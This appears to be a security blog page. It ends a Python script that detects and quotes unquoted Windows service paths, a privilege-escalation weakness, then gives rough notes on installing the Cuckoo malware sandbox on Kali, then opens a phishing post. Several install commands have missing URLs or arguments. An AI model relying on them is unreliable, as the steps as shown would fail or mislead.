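        raise ValueError("no .exe found in %r" % pathname)
    return p[:m.end()], p[m.end():].strip()


def is_unquoted_vulnerable(pathname):
    """Same test as the PowerShell filter: not already quoted, and a space
    somewhere in the executable path (spaces in the arguments do not count)."""
    p = pathname.strip()
    if not p or p.startswith('"'):
        return False
    m = EXE_END_RE.search(p)
    return m is not None and " " in p[:m.end()]


def quote_image_path(pathname):
    """Quote only the executable and keep the arguments exactly as they were."""
    if not is_unquoted_vulnerable(pathname):
        return pathname
    exe, args = split_image_path(pathname)
    return '"%s"%s' % (exe, (" " + args) if args else "")


def plan_fixes(services):
    """services: iterable of (name, pathname). Returns {name: corrected path}
    for only the services that need a change."""
    return {name: quote_image_path(path)
            for name, path in services if is_unquoted_vulnerable(path)}


# Constructed sample service table (names and paths are made up)
SAMPLE_SERVICES = [
    ("VendorAgent", r"C:\Program Files\Vendor\agent.exe -k net"),
    ("Quoted", r'"C:\Program Files\Vendor\svc.exe" -k net'),
    ("Svchost", r"C:\Windows\system32\svchost.exe -k netsvcs"),
    ("NoArgs", r"C:\Program Files (x86)\Tool\tool.exe"),
    ("OddDir", r"C:\my tools.exe\bin\run.exe"),
]


if __name__ == "__main__":
    for name, fixed in sorted(plan_fixes(SAMPLE_SERVICES).items()):
        print("%-12s -> %s" % (name, fixed))
```

Only VendorAgent, NoArgs and OddDir come back from plan_fixes: the quoted service is already safe, and svchost has its only space in the arguments, which the service control manager already parses correctly.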




Install Cuckoo Sandbox Notes

I thought I would record my notes on installing the Cuckoo sandbox.  These notes do not cover setting up the configuration files for the sandboxes.


# Created to install cuckoo Sandbox on Kali linux
# Taken from:
# Most of what is in the above link worked

#apt-get install python
#apt-get install python-sqlalchemy python-bson

# If the following repositories are not present they need to be added to /etc/apt/sources.list
# From:
#deb kali main non-free contrib
#deb kali/updates main contrib non-free
#deb-src kali main non-free contrib
#deb-src kali/updates main contrib non-free
#deb kali-bleeding-edge main - This will install the kernel 3.18 headers you have to work with this...

# With the bleeding edge it installs the 3.14 linux-image and the 3.18 linux-headers...  Watch out for this mismatch.
#apt-cache search linux-image
#apt-cache search linux-headers

# apt-get upgrade
# apt-get update

## Reboot the Kali workstation

#apt-get install python-libvirt python-dpkt python-pefile python-jinja2 python-magic python-pymongo python-gridfs python-bottle python-chardet

#apt-get install python-pip

#pip install cybox
#pip install jinja2 pymongo bottle pefile django chardet

# Unable to install the below package using pip install ** Error **
#pip install maec==

#apt-get install virtualbox tcpdump

#setcap cap_net_raw,cap_net_admin=eip /usr/sbin/tcpdump

#adduser cuckoo
#usermod -G vboxusers cuckoo

#apt-get install ssdeep python-pyrex subversion libfuzzy-dev

#pip install ssdeep

#svn checkout pyssdeep-read-only
#cd pyssdeep-read-only
#python build
#python install
#cd ..

#apt-get install python-pymongo mongodb

#apt-get install g++ libpcre3 libpcre3-dev  # These packages were already installed when I tried

#tar xvzf yara-1.6.tar.gz
#cd yara-1.6
#make check
#make install
#cd ..

#tar xvzf yara-python-1.6.tar.gz
#cd yara-python-1.6
#python build
#python install
#cd ..

#apt-get install git
#git clone git://

Prepare, Bait, Hook, Execute and Control - Buffer Overflows

This post is the third of four that I am planning to write about social engineering specifically about phishing.  The form of phishing that...